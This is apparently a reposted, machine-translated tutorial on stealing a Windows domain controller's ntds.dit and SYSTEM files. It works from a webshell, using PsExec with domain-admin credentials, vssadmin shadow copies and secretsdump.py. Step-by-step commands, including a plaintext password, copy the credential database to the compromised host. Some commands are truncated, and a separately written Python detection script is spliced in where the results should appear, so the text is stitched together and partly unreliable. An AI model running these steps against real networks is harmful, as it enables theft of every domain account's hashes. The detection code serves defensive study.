How to export domain control ntds.dit remotely through Webshell

2025-01-18 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)05/31 Report--

This post is about how to export a domain controller's ntds.dit remotely via a webshell. Xiaobian thinks it is quite practical, so it is shared here for everyone's reference. Let's follow Xiaobian and have a look.

I faced the same problem during a penetration test (no server with a public IP). After discussing it a little, I found a way to do this through a webshell, provided we have the credentials of an "AD Domain Admin" user.

Here we assume:

1. AD domain controller (queen.DC1.indishell.lab - 192.168.56.200)

2. Windows machine joined to the AD domain (LABONE - 192.168.56.101)

3. Obtained Windows AD domain administrator credentials (you can use any available exploit; here I used "MS14-025" to get the domain administrator user's password)

Now I have web shell access on a Windows machine joined to the domain, namely "LABONE" with the IP "192.168.56.101". The domain administrator's username is "user1" and the password is "ica_1046".

Here, I will use the following two binary files:

1. psexec.exe <- a Windows (Sysinternals) tool

2. vssadmin <- the command used to create/delete volume shadow copies of Windows drives

In any case, if we manage to run the "vssadmin" command on the Windows AD domain controller, it will create a shadow copy of the "C" drive, and from that shadow copy we can copy the "ntds.dit" and "SYSTEM" files. To accomplish this, we will use "psexec.exe", which can execute commands on a remote Windows machine if we specify the target machine's IP, the domain administrator's username and password, and the "elevated" option (by passing -h). We need to upload psexec.exe to the Windows machine "LABONE" through the web shell. From the web shell we will run psexec with the "vssadmin" command, specifying the AD domain controller's IP, the domain administrator's username and password; psexec will then execute the vssadmin command remotely on the Windows AD domain controller.

After the shadow copy of drive "C" has been created, we need to copy the "ntds.dit" and "SYSTEM" files from that shadow copy to the machine we have web shell access to, i.e. the Windows domain machine "LABONE". This can also be done with "psexec": we simply specify the target AD domain controller's IP, the domain administrator's username and password together with a "copy" command, which copies ntds.dit and SYSTEM from the shadow copy to the LABONE machine over SMB. Here, I copied these files into the same directory where I dropped the psexec binary.

The general usage of "psexec" to execute a command on a remote host is:

psexec.exe \\remote_IP -u user_name -p password_of_the_user -h cmd /c "command_which_we_want_to_execute"

In my case, the values are:

remote_IP: 192.168.56.200 (queen.DC1.indishell.lab)

user_name: user1

password_of_the_user: ica_1046

I have web shell access on the Windows domain machine "LABONE" and have uploaded the psexec binary to the server.

First, let's check whether a shadow copy of drive "C" is already available. You can list the available shadow copies with the following command:

vssadmin list shadows

Here, the web shell cannot display the full output of commands executed on the remote host through the psexec binary, so I redirected the command output to "LABONE", saving it in the C:\xampp\htdocs\box\ps\ directory. The command for this step is:

PsExec.exe \\192.168.56.200 -u user1 -p ica_1046 -h cmd /c "vssadmin list shadows > \\192.168.56.101\C$\xampp\htdocs\box\ps\out.txt"

The web shell shows psexec executing the command on the remote Windows AD domain controller. If all goes well, we get a file named "out.txt" in the directory "C:\xampp\htdocs\box\ps" containing the output of the "vssadmin list shadows" command executed on the AD domain controller (192.168.56.200).

You can see that the out.txt file has been generated in the directory, let's take a look at the contents below.

The contents of the "out.txt" file indicate that the target domain controller does not have any shadow copies so far.

Let's create a shadow copy of drive "C" to steal the "ntds.dit" and "SYSTEM" files.

The commands for creating a shadow copy of drive c are as follows:

vssadmin create shadow /for=C:

We need the name of the newly created shadow copy of drive "C", which appears in the command's output, so we will redirect the output of the above command to the machine we have web shell access to.

To copy the "ntds.dit" and "SYSTEM" files from the target machine, we need the name of that shadow copy. The final command is:

PsExec.exe \\192.168.56.200 -u user1 -p ica_1046 -h cmd /c "vssadmin create shadow /for=C: >

With the above command, psexec executes the command on the Windows AD domain controller (192.168.56.200) to create a shadow copy of the "C" drive and redirects the output of the command to the "C:\xampp\htdocs\box\ps\out.txt" file on the "LABONE" machine.

The contents of the "out.txt" file will tell us where the shadow copy is located.

In the screenshot above we can see that the shadow copy volume name is "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\".

The locations of the "ntds.dit" and "SYSTEM" files are as follows:

"shadow_copy_volume_name\Windows\NTDS\NTDS.dit"

"shadow_copy_volume_name\Windows\System32\config\SYSTEM"

Namely:

"\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\NTDS\NTDS.dit"

"\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\System32\config\SYSTEM"

Let's copy the "ntds.dit" file from the target Windows AD domain controller using the following command:

PsExec.exe \\192.168.56.200 -u user1 -p ica_1046 -h cmd /c "copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\NTDS\NTDS.dit \\192.168.56.101\C$\xampp\htdocs\box\ps\"

This command copies the "ntds.dit" file from the remote machine (192.168.56.200) to the "C:\xampp\htdocs\box\ps\" directory of the "LABONE" machine (192.168.56.101).

You can see that the web shell shows that a file has been copied from the target DC machine to my machine. Let's confirm and check "C:\xampp\htdocs\box\ps" to see if the "ntds.dit" file has been copied successfully.

As shown above, the "ntds.dit" file has been successfully copied to the "LABONE" machine.

Again, we use this command to copy the "SYSTEM" file:

PsExec.exe \\192.168.56.200 -u user1 -p ica_1046 -h cmd /c "copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\System32\config\SYSTEM

Command execution succeeds and the Web shell displays the message "1 file copied." Check again and confirm successful execution.

You can see that the "SYSTEM" file has also been successfully copied to the "LABONE" machine. We can download these files from here using a web shell.

Now we can extract the domain, uid, rid, LM and NT hashes from the "ntds.dit" and "SYSTEM" files using the Python script secretsdump.py (from Impacket). The command is as follows:

python secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL

The results were as follows:
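From the defender's side, the procedure above leaves a distinctive process-creation trail on the domain controller: the PsExec service (PSEXESVC) spawning cmd.exe, vssadmin creating a shadow copy, and a copy of NTDS.dit or SYSTEM from a HarddiskVolumeShadowCopy path with output redirected into a remote admin share. The following Python is an added detection example, not part of the original article; the Sysmon-style events are constructed to mirror the article's commands, and the (host, parent image, command line) field layout is an assumption.

```python
import re
from collections import defaultdict

# Constructed Sysmon-style process-creation events: (host, parent image, command line).
# Modelled on the article's commands plus benign noise; not real telemetry.
SAMPLE_EVENTS = [
    ("DC1", r"C:\Windows\PSEXESVC.exe",
     r'cmd /c "vssadmin list shadows > \\192.168.56.101\C$\xampp\htdocs\box\ps\out.txt"'),
    ("DC1", r"C:\Windows\PSEXESVC.exe",
     r'cmd /c "vssadmin create shadow /for=C: > \\192.168.56.101\C$\xampp\htdocs\box\ps\out.txt"'),
    ("DC1", r"C:\Windows\PSEXESVC.exe",
     r'cmd /c "copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\NTDS\NTDS.dit \\192.168.56.101\C$\xampp\htdocs\box\ps\"'),
    ("DC1", r"C:\Windows\System32\services.exe", r"C:\Windows\System32\wbem\WmiPrvSE.exe -Embedding"),
    ("LABONE", r"C:\xampp\apache\bin\httpd.exe", r'cmd.exe /c "whoami"'),
]

VSS_CREATE = re.compile(r"\bvssadmin(?:\.exe)?\s+create\s+shadow", re.I)
# The two files that together yield domain hashes, read out of a shadow copy volume.
SHADOW_NTDS = re.compile(
    r"HarddiskVolumeShadowCopy\d+\\Windows\\(?:NTDS\\ntds\.dit|System32\\config\\SYSTEM)", re.I)
# Command output redirected into a remote admin share (the article's out.txt trick).
ADMIN_SHARE_REDIRECT = re.compile(r">\s*\\\\[\w.-]+\\[A-Za-z]\$\\", re.I)


def classify(event):
    """Return the set of suspicious traits seen in one (host, parent, cmdline) event."""
    _, parent, cmdline = event
    tags = set()
    if parent.lower().endswith(r"\psexesvc.exe"):
        tags.add("remote_exec_psexec")   # process was spawned by the PsExec service binary
    if VSS_CREATE.search(cmdline):
        tags.add("vss_create")
    if SHADOW_NTDS.search(cmdline):
        tags.add("shadow_ntds_read")
    if ADMIN_SHARE_REDIRECT.search(cmdline):
        tags.add("admin_share_redirect")
    return tags


def find_ntds_theft(events):
    """Correlate per host: alert when a shadow copy is created and NTDS/SYSTEM is read from it."""
    per_host = defaultdict(set)
    for ev in events:
        per_host[ev[0]] |= classify(ev)
    return [{"host": host, "tags": tags} for host, tags in per_host.items()
            if {"vss_create", "shadow_ntds_read"} <= tags]


if __name__ == "__main__":
    for alert in find_ntds_theft(SAMPLE_EVENTS):
        print(alert["host"], sorted(alert["tags"]))
```

In production the same correlation would run over Security 4688 or Sysmon Event ID 1 records keyed by host and a short time window, and the admin-share redirect on its own is worth a lower-severity alert because it reveals where the output is being staged.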

Thank you for reading! About "how to export domain control ntds.dit remotely through Webshell" this article is shared here, I hope the above content can be of some help to everyone, so that everyone can learn more knowledge, if you think the article is good, you can share it to let more people see it!
